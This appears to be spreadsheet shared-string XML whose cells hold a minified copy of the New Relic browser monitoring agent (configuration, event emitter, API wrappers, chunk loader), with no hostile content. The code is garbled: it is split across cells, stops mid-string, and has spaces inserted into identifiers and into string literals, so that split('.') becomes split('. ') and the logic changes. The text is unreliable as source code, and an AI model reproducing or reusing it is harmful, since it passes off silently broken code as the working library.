    <t>NREUM||(NREUM={})).loader_config={agentID:"221357619",accountID:"3194957",trustKey:"3194957",xpid:"VwcOVV9WDxACVlBRAgYCVVI=",licenseKey:"NRJS-b16ef269fd11602a41e",applicationID:"221357536"};;(()=&gt;{var e,t,r={9071:(e,t,r)=&gt;{"use strict";r.d(t,{I:()=&gt;n});var n=0,i=navigator.userAgent.match(/Firefox[\/\s](\d+\.\d+)/);i&amp;&amp;(n=+i[1])},8768:(e,t,r)=&gt;{"use strict";r.d(t,{T:()=&gt;n,p:()=&gt;i});const n=/(iPad|iPhone|iPod)/g.test(navigator.userAgent),i=n&amp;&amp;Boolean("undefined"==typeof SharedWorker)},6562:(e,t,r)=&gt;{"use strict";r.d(t,{P_:()=&gt;g,Mt:()=&gt;v,C5:()=&gt;f,DL:()=&gt;y,OP:()=&gt;k,lF:()=&gt;L,Yu:()=&gt;E,Dg:()=&gt;p,CX:()=&gt;d,GE:()=&gt;w,sU:()=&gt;H});var n={};r.r(n),r.d(n,{agent:()=&gt;A,match:()=&gt;j,version:()=&gt;x});var i=r(6797),o=r(909),a=r(8610);class s{constructor(e,t){try{if(!e||"object"!=typeof e)return(0,a. Z)("New setting a Configurable requires an object as input");if(!t||"object"!=typeof t)return(0,a. Z)("Setting a Configurable requires a model to set its initial properties");Object.assign(this,t),Object.entries(e).forEach((e=&gt;{let[t,r]=e;const n=(0,o.q)(t);n.length&amp;&amp;r&amp;&amp;"object"==typeof r&amp;&amp;n.forEach((e=&gt;{e in r&amp;&amp;((0,a.</t>
  </si>
  <si>
    <t>Z)('"'.concat(e,'" is a protected attribute and can not be changed in feature ').concat(t,".   It will have no effect. ")),delete r[e])})),this[t]=r}))}catch(e){(0,a.</t>
  </si>
  <si>
    <t>Z)("An error occured while setting a Configurable",e)}}}const c={beacon:i.ce.beacon,errorBeacon:i.ce.errorBeacon,licenseKey:void 0,applicationID:void 0,sa:void 0,queueTime:void 0,applicationTime:void 0,ttGuid:void 0,user:void 0,account:void 0,product:void 0,extra:void 0,jsAttributes:{},userAttributes:void 0,atts:void 0,transactionName:void 0,tNamePlain:void 0},u={};function f(e){if(!e)throw new Error("All info objects require an agent identifier!");if(!u[e])throw new Error("Info for ".concat(e," was never set"));return u[e]}function d(e,t){if(!e)throw new Error("All info objects require an agent identifier!");u[e]=new s(t,c),(0,i.Qy)(e,u[e],"info")}const l={allow_bfcache:!0,privacy:{cookies_enabled:!0},ajax:{deny_list:void 0,enabled:!0,harvestTimeSeconds:10},distributed_tracing:{enabled:void 0,exclude_newrelic_header:void 0,cors_use_newrelic_header:void 0,cors_use_tracecontext_headers:void 0,allowed_origins:void 0},ssl:void 0,obfuscate:void 0,jserrors:{enabled:!0,harvestTimeSeconds:10},metrics:{enabled:!0},page_action:{enabled:!0,harvestTimeSeconds:30},page_view_event:{enabled:!0},page_view_timing:{enabled:!0,harvestTimeSeconds:30,long_task:!1},session_trace:{enabled:!0,harvestTimeSeconds:10},spa:{enabled:!0,harvestTimeSeconds:10}},h={};function g(e){if(!e)throw new Error("All configuration objects require an agent identifier!");if(!h[e])throw new Error("Configuration for ".concat(e," was never set"));return h[e]}function p(e,t){if(!e)throw new Error("All configuration objects require an agent identifier!");h[e]=new s(t,l),(0,i.Qy)(e,h[e],"config")}function v(e,t){if(!e)throw new Error("All configuration objects require an agent identifier!");var r=g(e);if(r){for(var n=t.split(". "),i=0;i&lt;n.length-1;i++)if("object"!=typeof(r=r[n[i]]))return;r=r[n[n.length-1]]}return r}const m={accountID:void 0,trustKey:void 0,agentID:void 0,licenseKey:void 0,applicationID:void 0,xpid:void 0},b={};function y(e){if(!e)throw new Error("All loader-config objects require an agent identifier!");if(!b[e])throw new Error("LoaderConfig for ".concat(e," was never set"));return b[e]}function w(e,t){if(!e)throw new Error("All loader-config objects require an agent identifier!");b[e]=new s(t,m),(0,i.Qy)(e,b[e],"loader_config")}const E=(0,i.mF)().o;var A =</t>
  </si>
  <si>
    <t>null,x=null;const T=/Version\/(\S+)\s+Safari/;if(navigator.userAgent){var _=navigator.userAgent,S=_.match(T);S&amp;&amp;-1===_.indexOf("Chrome")&amp;&amp;-1===_.indexOf("Chromium")&amp;&amp;(A="Safari",x=S[1])}function j(e,t){if(!A)return!1;if(e!==A)return!1;if(!t)return!0;if(!x)return!1;for(var r=x.split(". "),n=t.split(". "),i=0;i&lt;n.length;i++)if(n[i]!==r[i])return!1;return!0}var N=r(5526),D=r(2374);const O="NRBA_SESSION_ID";function P(){if(!D.il)return null;try{let e;return null===(e=window.sessionStorage.getItem(O))&amp;&amp;(e=(0,N.ky)(16),window.sessionStorage.setItem(O,e)),e}catch(e){return null}}var</t>
  </si>
  <si>
    <t>R=r(8226);const C=e=&gt;({buildEnv:R.Re,customTransaction:void 0,disabled:!1,distMethod:R.gF,isolatedBacklog:!1,loaderType:void 0,maxBytes:3e4,offset:Math.floor(D._A?.performance?.timeOrigin||D._A?.performance?.timing?.navigationStart||Date.now()),onerror:void 0,origin:""+D._A.location,ptid:void 0,releaseIds:{},sessionId:1==v(e,"privacy.cookies_enabled")?P():null,xhrWrappable:"function"==typeof D._A.XMLHttpRequest?.prototype?.addEventListener,userAgent:n,version:R.q4}),I={};function k(e){if(!e)throw new Error("All runtime objects require an agent identifier!");if(!I[e])throw new Error("Runtime for ".concat(e," was never set"));return I[e]}function H(e,t){if(!e)throw new Error("All runtime objects require an agent identifier!");I[e]=new s(t,C(e)),(0,i.Qy)(e,I[e],"runtime")}function L(e){return function(e){try{const t=f(e);return!!t.licenseKey&amp;&amp;!!t.errorBeacon&amp;&amp;!!t.applicationID}catch(e){return!1}}(e)}},8226:(e,t,r)=&gt;{"use strict";r.d(t,{Re:()=&gt;i,gF:()=&gt;o,q4:()=&gt;n});const n="1.229.0",i="PROD",o="CDN"},9557:(e,t,r)=&gt;{"use strict";r.d(t,{w:()=&gt;o});var n=r(8610);const i={agentIdentifier:""};class o{constructor(e){try{if("object"!=typeof e)return(0,n. Z)("shared context requires an object as input");this.sharedContext={},Object.assign(this.sharedContext,i),Object.entries(e).forEach((e=&gt;{let[t,r]=e;Object.keys(i).includes(t)&amp;&amp;(this.sharedContext[t]=r)}))}catch(e){(0,n.Z)("An error occured while setting SharedContext",e)}}}},4329:(e,t,r)=&gt;{"use strict";r.d(t,{L:()=&gt;f,R:()=&gt;c});var n=r(3752),i=r(7022),o=r(4045),a=r(2325);const s={};function c(e,t){const r={staged:!1,priority:a.p[t]||0};u(e),s[e].get(t)||s[e].set(t,r)}function u(e){e&amp;&amp;(s[e]||(s[e]=new Map))}function f(){let e=arguments.length&gt;0&amp;&amp;void 0!==arguments[0]?arguments[0]:"",t=arguments.length&gt;1&amp;&amp;void 0!==arguments[1]?arguments[1]:"feature";if(u(e),!e||!s[e].get(t))return a(t);s[e].get(t).staged=!0;const r=Array.from(s[e]);function a(t){const r=e?n.ee.get(e):n.ee,a=o.X.handlers;if(r.backlog&amp;&amp;a){var s=r.backlog[t],c=a[t];if(c){for(var u=0;s&amp;&amp;u&lt;s.length;++u)d(s[u],c);(0,i.</t>
  </si>
  <si>
    <t>D)(c,(function(e,t){(0,i. D)(t,(function(t,r){r[0].on(e,r[1])}))}))}delete a[t],r.backlog[t]=null,r.emit("drain-"+t,[])}}r.every((e=&gt;{let[t,r]=e;return r.staged}))&amp;&amp;(r.sort(((e,t)=&gt;e[1].priority-t[1].priority)),r.forEach((e=&gt;{let[t]=e;a(t)})))}function d(e,t){var r=e[1];(0,i. D)(t[r],(function(t,r){var n=e[0];if(r[0]===n){var i=r[1],o=e[3],a=e[2];i.apply(o,a)}}))}},3752:(e,t,r)=&gt;{"use strict";r.d(t,{c:()=&gt;d,ee:()=&gt;u});var n=r(6797),i=r(3916),o=r(7022),a=r(6562),s="nr@context";let c=(0,n.fP)();var u;function</t>
  </si>
  <si>
    <t>f(){}function d(e){return(0,i. X)(e,s,l)}function l(){return new f}function h(){u.aborted=!0,u.backlog={}}c.ee?u=c.ee:(u=function e(t,r){var n={},c={},d={},g=!1;try{g=16===r.length&amp;&amp;(0,a. OP)(r).isolatedBacklog}catch(e){}var p={on:b,addEventListener:b,removeEventListener:y,emit:m,get:E,listeners:w,context:v,buffer:A,abort:h,aborted:!1,isBuffering:x,debugId:r,backlog:</t>
  </si>
  <si>
    <t>g?{}:t&amp;&amp;"object"==typeof t.backlog?t.backlog:{}};return p;function v(e){return e&amp;&amp;e instanceof f?e:e?(0,i. X)(e,s,l):l()}function m(e,r,n,i,o){if(!1!==o&amp;&amp;(o=!0),!u.aborted||i){t&amp;&amp;o&amp;&amp;t.emit(e,r,n);for(var a=v(n),s=w(e),f=s.length,d=0;d&lt;f;d++)s[d].apply(a,r);var l=T()[c[e]];return l&amp;&amp;l.push([p,e,r,a]),a}}function b(e,t){n[e]=w(e).concat(t)}function y(e,t){var r=n[e];if(r)for(var i=0;i&lt;r.length;i++)r[i]===t&amp;&amp;r.splice(i,1)}function w(e){return n[e]||[]}function E(t){return d[t]=d[t]||e(p,t)}function A(e,t){var r=T();p.aborted||(0,o.</t>
  </si>
  <si>
    <t>D)(e,(function(e,n){t=t||"feature",c[n]=t,t in r||(r[t]=[])}))}function x(e){return!!T()[c[e]]}function T(){return p.backlog}}(void 0,"globalEE"),c.ee=u)},9252:(e,t,r)=&gt;{"use strict";r.d(t,{E:()=&gt;n,p:()=&gt;i});var n=r(3752).ee.get("handle");function i(e,t,r,i,o){o?(o.buffer([e],i),o.emit(e,t,r)):(n.buffer([e],i),n.emit(e,t,r))}},4045:(e,t,r)=&gt;{"use strict";r.d(t,{X:()=&gt;o});var n=r(9252);o.on=a;var i=o.handlers={};function o(e,t,r,o){a(o||n. E,i,e,t,r)}function a(e,t,r,i,o){o||(o="feature"),e||(e=n.E);var a=t[o]=t[o]||{};(a[r]=a[r]||[]).push([e,i])}},8544:(e,t,r)=&gt;{"use strict";r.d(t,{bP:()=&gt;s,iz:()=&gt;c,m$:()=&gt;a});var n=r(2374);let i=!1,o=!1;try{const e={get passive(){return i=!0,!1},get signal(){return o=!0,!1}};n._A.addEventListener("test",null,e),n._A.removeEventListener("test",null,e)}catch(e){}function a(e,t){return i||o?{capture:!!e,passive:i,signal:t}:!!e}function s(e,t){let r=arguments.length&gt;2&amp;&amp;void 0!==arguments[2]&amp;&amp;arguments[2];window.addEventListener(e,t,a(r))}function c(e,t){let r=arguments.length&gt;2&amp;&amp;void 0!==arguments[2]&amp;&amp;arguments[2];document.addEventListener(e,t,a(r))}},5526:(e,t,r)=&gt;{"use strict";r.d(t,{Ht:()=&gt;a,M:()=&gt;o,Rl:()=&gt;i,ky:()=&gt;s});var n=r(2374);function i(){var e=null,t=0,r=n._A?.crypto||n._A?.msCrypto;function i(){return e?15&amp;e[t++]:16*Math.random()|0}r&amp;&amp;r.getRandomValues&amp;&amp;(e=r.getRandomValues(new Uint8Array(31)));for(var o,a="xxxxxxxx-xxxx-4xxx-yxxx-xxxxxxxxxxxx",s="",c=0;c&lt;a.length;c++)s+="x"===(o=a[c])?i().toString(16):"y"===o?(o=3&amp;i()|8).toString(16):o;return s}function o(){return s(16)}function a(){return s(32)}function s(e){var t=null,r=0,n=self.crypto||self.msCrypto;n&amp;&amp;n.getRandomValues&amp;&amp;Uint8Array&amp;&amp;(t=n.getRandomValues(new Uint8Array(31)));for(var i=[],o=0;o&lt;e;o++)i.push(a().toString(16));return i.join("");function a(){return t?15&amp;t[r++]:16*Math.random()|0}}},2053:(e,t,r)=&gt;{"use strict";function n(){return Math.round(performance.now())}r.d(t,{z:()=&gt;n})},6368:(e,t,r)=&gt;{"use strict";r.d(t,{e:()=&gt;o});var n=r(2374),i={};function o(e){if(e in i)return i[e];if(0===(e||"").indexOf("data:"))return{protocol:"data"};let t;var r=n._A?.location,o={};if(n.il)t=document.createElement("a"),t.href=e;else try{t=new URL(e,r.href)}catch(e){return o}o.port=t.port;var a=t.href.split("://");!o.port&amp;&amp;a[1]&amp;&amp;(o.port=a[1].split("/")[0].split("@").pop().split(":")[1]),o.port&amp;&amp;"0"!==o.port||(o.port="https"===a[0]?"443":"80"),o.hostname=t.hostname||r.hostname,o.pathname=t.pathname,o.protocol=a[0],"/"!==o.pathname.charAt(0)&amp;&amp;(o.pathname="/"+o.pathname);var s=!t.protocol||":"===t.protocol||t.protocol===r.protocol,c=t.hostname===r.hostname&amp;&amp;t.port===r.port;return o.sameOrigin=s&amp;&amp;(!t.hostname||c),"/"===o.pathname&amp;&amp;(i[e]=o),o}},8610:(e,t,r)=&gt;{"use strict";function n(e,t){console&amp;&amp;console.warn&amp;&amp;"function"==typeof console.warn&amp;&amp;(console.warn("New Relic: ".concat(e)),t&amp;&amp;console.warn(t))}r.d(t,{Z:()=&gt;n})},3916:(e,t,r)=&gt;{"use strict";r.d(t,{X:()=&gt;i});var n=Object.prototype.hasOwnProperty;function i(e,t,r){if(n.call(e,t))return e[t];var i=r();if(Object.defineProperty&amp;&amp;Object.keys)try{return Object.defineProperty(e,t,{value:i,writable:!0,enumerable:!1}),i}catch(e){}return e[t]=i,i}},2374:(e,t,r)=&gt;{"use strict";r.d(t,{_A:()=&gt;o,il:()=&gt;n,lW:()=&gt;a,v6:()=&gt;i});const n=Boolean("undefined"!=typeof window&amp;&amp;window.document),i=Boolean("undefined"!=typeof WorkerGlobalScope&amp;&amp;self.navigator instanceof WorkerNavigator);let o=(()=&gt;{if(n)return window;if(i){if("undefined"!=typeof globalThis&amp;&amp;globalThis instanceof WorkerGlobalScope)return globalThis;if(self instanceof WorkerGlobalScope)return self}throw new Error('New Relic browser agent shutting down due to error:</t>
  </si>
  <si>
    <t>Unable to locate global scope. This is possibly due to code redefining browser global variables like "self" and "window". ')})();function</t>
  </si>
  <si>
    <t>a(){return o}},7022:(e,t,r)=&gt;{"use strict";r.d(t,{D:()=&gt;i});var n=Object.prototype.hasOwnProperty;function i(e,t){var r=[],i="",o=0;for(i in e)n.call(e,i)&amp;&amp;(r[o]=t(i,e[i]),o+=1);return r}},2438:(e,t,r)=&gt;{"use strict";r.d(t,{P:()=&gt;o});var n=r(3752);const i=()=&gt;{const e=new WeakSet;return(t,r)=&gt;{if("object"==typeof r&amp;&amp;null!==r){if(e.has(r))return;e.add(r)}return r}};function o(e){try{return JSON.stringify(e,i())}catch(e){try{n.ee.emit("internal-error",[e])}catch(e){}}}},2650:(e,t,r)=&gt;{"use strict";r.d(t,{K:()=&gt;a,b:()=&gt;o});var n=r(8544);function i(){return"undefined"==typeof document||"complete"===document.readyState}function o(e,t){if(i())return e();(0,n.bP)("load",e,t)}function a(e){if(i())return e();(0,n.iz)("DOMContentLoaded",e)}},6797:(e,t,r)=&gt;{"use strict";r.d(t,{EZ:()=&gt;u,Qy:()=&gt;c,ce:()=&gt;o,fP:()=&gt;a,gG:()=&gt;f,mF:()=&gt;s});var n=r(2053),i=r(2374);const o={beacon:"bam.nr-data.net",errorBeacon:"bam.nr-data.net"};function a(){return i._A.NREUM||(i._A.NREUM={}),void 0===i._A.newrelic&amp;&amp;(i._A.newrelic=i._A.NREUM),i._A.NREUM}function s(){let e=a();return e.o||(e.o={ST:i._A.setTimeout,SI:i._A.setImmediate,CT:i._A.clearTimeout,XHR:i._A.XMLHttpRequest,REQ:i._A.Request,EV:i._A.Event,PR:i._A.Promise,MO:i._A.MutationObserver,FETCH:i._A.fetch}),e}function c(e,t,r){let i=a();const o=i.initializedAgents||{},s=o[e]||{};return Object.keys(s).length||(s.initializedAt={ms:(0,n.z)(),date:new Date}),i.initializedAgents={...o,[e]:{...s,[r]:t}},i}function u(e,t){a()[e]=t}function f(){return function(){let e=a();const t=e.info||{};e.info={beacon:o.beacon,errorBeacon:o.errorBeacon,...t}}(),function(){let e=a();const t=e.init||{};e.init={...t}}(),s(),function(){let e=a();const t=e.loader_config||{};e.loader_config={...t}}(),a()}},6998:(e,t,r)=&gt;{"use strict";r.d(t,{N:()=&gt;i});var n=r(8544);function i(e){let t=arguments.length&gt;1&amp;&amp;void 0!==arguments[1]&amp;&amp;arguments[1];return void(0,n.iz)("visibilitychange",(function(){if(t){if("hidden"!=document.visibilityState)return;e()}e(document.visibilityState)}))}},6408:(e,t,r)=&gt;{"use strict";r.d(t,{W:()=&gt;i});var n=r(2374);function i(){return"function"==typeof n._A?.PerformanceObserver}},8675:(e,t,r)=&gt;{"use strict";r.d(t,{t:()=&gt;n});const n=r(2325).D.ajax},8322:(e,t,r)=&gt;{"use strict";r.d(t,{A:()=&gt;i,t:()=&gt;n});const n=r(2325).D.jserrors,i="nr@seenError"},6034:(e,t,r)=&gt;{"use strict";r.d(t,{gF:()=&gt;o,mY:()=&gt;i,t9:()=&gt;n,vz:()=&gt;s,xS:()=&gt;a});const n=r(2325).D.metrics,i="sm",o="cm",a="storeSupportabilityMetrics",s="storeEventMetrics"},6486:(e,t,r)=&gt;{"use strict";r.d(t,{t:()=&gt;n});const n=r(2325).D.pageAction},2484:(e,t,r)=&gt;{"use strict";r.d(t,{Dz:()=&gt;i,OJ:()=&gt;a,qw:()=&gt;o,t9:()=&gt;n});const n=r(2325).D.pageViewEvent,i="firstbyte",o="domcontent",a="windowload"},6382:(e,t,r)=&gt;{"use strict";r.d(t,{t:()=&gt;n});const n=r(2325).D.pageViewTiming},2628:(e,t,r)=&gt;{"use strict";r.r(t),r.d(t,{ADD_EVENT_LISTENER:()=&gt;p,BST_RESOURCE:()=&gt;a,BST_TIMER:()=&gt;l,END:()=&gt;u,FEATURE_NAME:()=&gt;i,FN_END:()=&gt;d,FN_START:()=&gt;f,ORIG_EVENT:()=&gt;g,PUSH_STATE:()=&gt;h,RESOURCE:()=&gt;s,RESOURCE_TIMING_BUFFER_FULL:()=&gt;o,START:()=&gt;c});var n=r(6562);const i=r(2325).D.sessionTrace,o="resourcetimingbufferfull",a="bstResource",s="resource",c="-start",u="-end",f="fn"+c,d="fn"+u,l="bstTimer",h="pushState",g=n.Yu.EV,p="addEventListener"},755:(e,t,r)=&gt;{"use strict";r.r(t),r.d(t,{BODY:()=&gt;A,CB_END:()=&gt;x,CB_START:()=&gt;u,END:()=&gt;E,FEATURE_NAME:()=&gt;i,FETCH:()=&gt;_,FETCH_BODY:()=&gt;m,FETCH_DONE:()=&gt;v,FETCH_START:()=&gt;p,FN_END:()=&gt;c,FN_START:()=&gt;s,INTERACTION:()=&gt;l,INTERACTION_API:()=&gt;f,INTERACTION_EVENTS:()=&gt;o,JSONP_END:()=&gt;b,JSONP_NODE:()=&gt;g,JS_TIME:()=&gt;T,MAX_TIMER_BUDGET:()=&gt;a,REMAINING:()=&gt;d,SPA_NODE:()=&gt;h,START:()=&gt;w,originalSetTimeout:()=&gt;y});var n=r(6562);r(2374);const i=r(2325).D.spa,o=["click","submit","keypress","keydown","keyup","change"],a=999,s="fn-start",c="fn-end",u="cb-start",f="api-ixn-",d="remaining",l="interaction",h="spaNode",g="jsonpNode",p="fetch-start",v="fetch-done",m="fetch-body-",b="jsonp-end",y=n.Yu. ST,w="-start",E="-end",A="-body",x="cb"+E,T="jsTime",_="fetch"},1509:(e,t,r)=&gt;{"use strict";r.d(t,{W:()=&gt;s});var n=r(6562),i=r(3752),o=r(5432),a=r(6797);class s{constructor(e,t,r){this.agentIdentifier=e,this.aggregator=t,this.ee=i.ee.get(e,(0,n.</t>
  </si>
  <si>
    <t>OP)(this.agentIdentifier).isolatedBacklog),this.featureName=r,this.blocked=!1,this.checkConfiguration()}checkConfiguration(){if(!(0,n.lF)(this.agentIdentifier)){let e={...(0,a.gG)().info?.jsAttributes};try{e={...e,...(0,n. C5)(this.agentIdentifier)?.jsAttributes}}catch(e){}(0,o.j)(this.agentIdentifier,{...(0,a.gG)(),info:{...(0,a.gG)().info,jsAttributes:e}})}}}},5432:(e,t,r)=&gt;{"use strict";r.d(t,{j:()=&gt;w});var n=r(8683),i=r.n(n),o=r(2325),a=r(6562),s=r(9252),c=r(7022),u=r(3752),f=r(2053),d=r(4329),l=r(2650),h=r(2374),g=r(8610),p=r(6034);var v=r(6797);const m={stn:[o. D.sessionTrace],err:[o.D.jserrors,o.D.metrics],ins:[o.</t>
  </si>
  <si>
    <t>D.pageAction],spa:[o. D.spa]};const b={};function y(){const e=(0,v.gG)();["setErrorHandler","finished","addToTrace","inlineHit","addRelease","addPageAction","setCurrentRouteName","setPageViewName","setCustomAttribute","interaction","noticeError"].forEach((t=&gt;{e[t]=function(){for(var r=arguments.length,n=new Array(r),i=0;i&lt;r;i++)n[i]=arguments[i];return function(t){for(var r=arguments.length,n=new Array(r&gt;1?r-1:0),i=1;i&lt;r;i++)n[i-1]=arguments[i];let o=[];return Object.values(e.initializedAgents).forEach((e=&gt;{e.exposed&amp;&amp;e.api[t]&amp;&amp;o.push(e.api[t](...n))})),o.length&gt;1?returnsVals:o[0]}(t,...n)}}))}function w(e){let t=arguments.length&gt;1&amp;&amp;void 0!==arguments[1]?arguments[1]:{},n=arguments.length&gt;2?arguments[2]:void 0,w=arguments.length&gt;3?arguments[3]:void 0,{init:E,info:A,loader_config:x,runtime:T={loaderType: n},exposed:_=!0}=t;const S=(0,v.gG)();A||(E=S.init,A=S.info,x=S.loader_config),h.v6&amp;&amp;(A.jsAttributes={...A.jsAttributes,isWorker:!0}),(0,a.</t>
  </si>
  <si>
    <t>CX)(e,A),(0,a. Dg)(e,E||{}),(0,a.GE)(e,x||{}),(0,a.sU)(e,T),y();const j=function(e,t){t||(0,d. R)(e,"api");const n={};var v=u.ee.get(e),m=v.get("tracer"),b="api-",y=b+"ixn-";function w(){}(0,c.</t>
  </si>
  <si>
    <t>D)(["setErrorHandler","finished","addToTrace","inlineHit","addRelease"],(function(e,t){n[t]=A(b,t,!0,"api")})),n.addPageAction=A(b,"addPageAction",!0,o. D.pageAction),n.setCurrentRouteName=A(b,"routeName",!0,o.D.spa),n.setPageViewName=function(t,r){if("string"==typeof t)return"/"!==t.charAt(0)&amp;&amp;(t="/"+t),(0,a. OP)(e).customTransaction=(r||"http://custom.transaction")+t,A(b,"setPageViewName",!0,"api")()},n.setCustomAttribute=function(t,r){const n=(0,a.C5)(e);return(0,a.</t>
  </si>
  <si>
    <t>CX)(e,{...n,jsAttributes:{... n.jsAttributes,[t]:r}}),A(b,"setCustomAttribute",!0,"api")()},n.interaction=function(){return(new w).get()};var E =w.prototype={createTracer:function(e,t){var r={},n=this,i="function"==typeof t;return(0,s.p)(y+"tracer",[(0,f.z)(),e,r],n,o.D.spa,v),function(){if(m.emit((i?"":"no-")+"fn-start",[(0,f.z)(),n,i],r),i)try{return t.apply(this,arguments)}catch(e){throw m.emit("fn-err",[arguments,this,"string"==typeof e?new Error(e):e],r),e}finally{m.emit("fn-end",[(0,f.z)()],r)}}}};function A(e,t,r,n){return function(){return(0,s.p)(p.xS,["API/"+t+"/called"],void 0,o.</t>
  </si>
  <si>
    <t>D.metrics,v),(0,s.p)(e+t,[(0,f.z)()].concat(i()(arguments)),r?null:this,n,v),r?void 0:this}}function x(){r.e(439).then(r.bind(r,5692)).then((t=&gt;{let{setAPI:r}=t;r(e),(0,d. L)(e,"api")})).catch((()=&gt;(0,g. Z)("Downloading runtime APIs failed...")))}return(0,c.</t>
  </si>
  <si>
    <t>D)("actionText,setName,setAttribute,save,ignore,onEnd,getContext,end,get".split(","),(function(e,t){E[t]=A(y,t,void 0,o. D.spa)})),n.noticeError=function(e,t){"string"==typeof e&amp;&amp;(e=new Error(e)),(0,s.p)(p.xS,["API/noticeError/called"],void 0,o. D.metrics,v),(0,s.p)("err",[e,(0,f.z)(),!1,t],void 0,o.</t>
  </si>
  <si>
    <t>D.jserrors,v)},h.v6?x():(0,l.b)((()=&gt;x()),!0),n}(e,w);return(0,v.Qy)(e,j,"api"),(0,v.Qy)(e,_,"exposed"),(0,v.EZ)("activatedFeatures",b),(0,v. EZ)("setToken",(t=&gt;function(e,t){var r=u.ee.get(t);e&amp;&amp;"object"==typeof e&amp;&amp;((0,c. D)(e,(function(e,t){if(!t)return(m[e]||[]).forEach((t=&gt;{(0,s.p)("block-"+e,[],void 0,t,r)}));b[e]||((0,s.p)("feat-"+e,[],void 0,m[e],r),b[e]=!0)})),(0,d.</t>
  </si>
  <si>
    <t>L)(t,o.D.pageViewEvent))}(t,e))),j}},909:(e,t,r)=&gt;{"use strict";r.d(t,{Z:()=&gt;i,q:()=&gt;o});var n=r(2325);function i(e){switch(e){case n.D.ajax:return[n. D.jserrors];case n.D.sessionTrace:return[n. D.ajax,n.D.pageViewEvent];case n.</t>
  </si>
  <si>
    <t>D.pageViewTiming:return[n. D.pageViewEvent];default: return[]}}function o(e){return e===n.</t>
  </si>
  <si>
    <t>D.jserrors?[]:["auto"]}},2325:(e,t,r)=&gt;{"use strict";r.d(t,{D:()=&gt;n,p:()=&gt;i});const n={ajax:"ajax",jserrors:"jserrors",metrics:"metrics",pageAction:"page_action",pageViewEvent:"page_view_event",pageViewTiming:"page_view_timing",sessionTrace:"session_trace",spa:"spa"},i={[n.pageViewEvent]:1,[n.pageViewTiming]:2,[n.metrics]:3,[n.jserrors]:4,[n.ajax]:5,[n.sessionTrace]:6,[n.pageAction]:7,[n.spa]:8}},8683:e=&gt;{e.exports=function(e,t,r){t||(t=0),void 0===r&amp;&amp;(r=e?e.length:0);for(var n=-1,i=r-t||0,o=Array(i&lt;0?0: i);++n&lt;i;)o[n]=e[t+n];return o}}},n={};function i(e){var t=n[e];if(void 0!==t)return t.exports;var o=n[e]={exports:{}};return r[e](o,o.exports,i),o.exports}i.m=r,i.n=e=&gt;{var t=e&amp;&amp;e.__esModule?()=&gt;e.default:()=&gt;e;return i.d(t,{a:t}),t},i.d=(e,t)=&gt;{for(var r in t)i.o(t,r)&amp;&amp;!i.o(e,r)&amp;&amp;Object.defineProperty(e,r,{enumerable:!0,get:t[r]})},i.f={},i.e=e=&gt;Promise.all(Object.keys(i.f).reduce(((t,r)=&gt;(i.f[r](e,t),t)),[])),i.u=e=&gt;(({78:"page_action-aggregate",147:"metrics-aggregate",193:"session_trace-aggregate",317:"jserrors-aggregate",348:"page_view_timing-aggregate",439:"async-api",729:"lazy-loader",786:"page_view_event-aggregate",873:"spa-aggregate",898:"ajax-aggregate"}[e]||e)+".</t>
  </si>
  <si>
    <t>"+{78:"8658345c",147:"fde0a6c6",193:"afe7d95b",317:"265ba41e",348:"92e7c907",439:"71768fc8",729:"ff971c03",786:"a968183b",862:"5040a0e9",873:"6a952689",898:"ebcbd305"}[e]+"-1.229.0.min.js"),i.o=(e,t)=&gt;Object.prototype.hasOwnProperty.call(e,t),e={},t="NRBA:",i.l=(r,n,o,a)=&gt;{if(e[r])e[r].push(n);else{var s,c;if(void 0!==o)for(var u=document.getElementsByTagName("script"),f=0;f&lt;u.length;f++){var d=u[f];if(d.getAttribute("src")==r||d.getAttribute("data-webpack")==t+o){s=d;break}}s||(c=!0,(s=document.createElement("script")).charset="utf-8",s.timeout=120,i.nc&amp;&amp;s.setAttribute("nonce",i.nc),s.setAttribute("data-webpack",t+o),s.src=r),e[r]=[n];var l=(t,n)=&gt;{s.onerror=s.onload=null,clearTimeout(h);var i=e[r];if(delete e[r],s.parentNode&amp;&amp;s.parentNode.removeChild(s),i&amp;&amp;i.forEach((e=&gt;e(n))),t)return t(n)},h=setTimeout(l.bind(null,void 0,{type:"timeout",target:s}),12e4);s.onerror=l.bind(null,s.onerror),s.onload=l.bind(null,s.onload),c&amp;&amp;document.head.appendChild(s)}},i.r=e=&gt;{"undefined"!=typeof Symbol&amp;&amp;Symbol.toStringTag&amp;&amp;Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},i.p="https://js-agent.newrelic.com/",(()=&gt;{var e={971:0,241:0};i.f.j=(t,r)=&gt;{var n=i.o(e,t)?e[t]:void 0;if(0!==n)if(n)r.push(n[2]);else{var o=new Promise(((r,i)=&gt;n=e[t]=[r,i]));r.push(n[2]=o);var a=i.p+i.u(t),s=new Error;i.l(a,(r=&gt;{if(i.o(e,t)&amp;&amp;(0!==(n=e[t])&amp;&amp;(e[t]=void 0),n)){var o=r&amp;&amp;("load"===r.type?"missing":r.type),a=r&amp;&amp;r.target&amp;&amp;r.target.src;s.message="Loading chunk "+t+" failed.\n("+o+": "+a+")",s.name="ChunkLoadError",s.type=o,s.request=a,n[1](s)}}),"chunk-"+t,t)}};var t=(t,r)=&gt;{var n,o,[a,s,c]=r,u=0;if(a.some((t=&gt;0!==e[t]))){for(n in s)i.o(s,n)&amp;&amp;(i.m[n]=s[n]);if(c)c(i)}for(t&amp;&amp;t(r);u&lt;a.length;u++)o=a[u],i.o(e,o)&amp;&amp;e[o]&amp;&amp;e[o][0](),e[o]=0},r=window.webpackChunkNRBA=window.webpackChunkNRBA||[];r.forEach(t.bind(null,0)),r.push=t.bind(null,r.push.bind(r))})();var o={};(()=&gt;{"use strict";i.r(o);var e=i(2325),t=i(6562);const r=Object.values(e.D);function n(e){const n={};return r.forEach((r=&gt;{n[r]=function(e,r){return!1!==(0,t. Mt)(r,"".concat(e,".enabled"))}(r,e)})),n}var a=i(5432),s=i(909),c=i(9252),u=i(8768),f=i(4329),d=i(1509),l=i(2650),h=i(2374),g=i(8610);class p extends d.W{constructor(e,t,r){let n=!(arguments.length&gt;3&amp;&amp;void 0!==arguments[3])||arguments[3];super(e,t,r),this.hasAggregator=!1,this.auto=n,this.abortHandler,n&amp;&amp;(0,f.R)(e,r)}importAggregator(){if(this.hasAggregator||!this.auto)return;this.hasAggregator=!0;const e=async()=&gt;{try{const{lazyLoader:e}=await i.e(729).then(i.bind(i,8110)),{Aggregate:t}=await e(this.featureName,"aggregate");new t(this.agentIdentifier,this.aggregator)}catch(e){(0,g.Z)("Downloading</t>
  </si>
  <si>
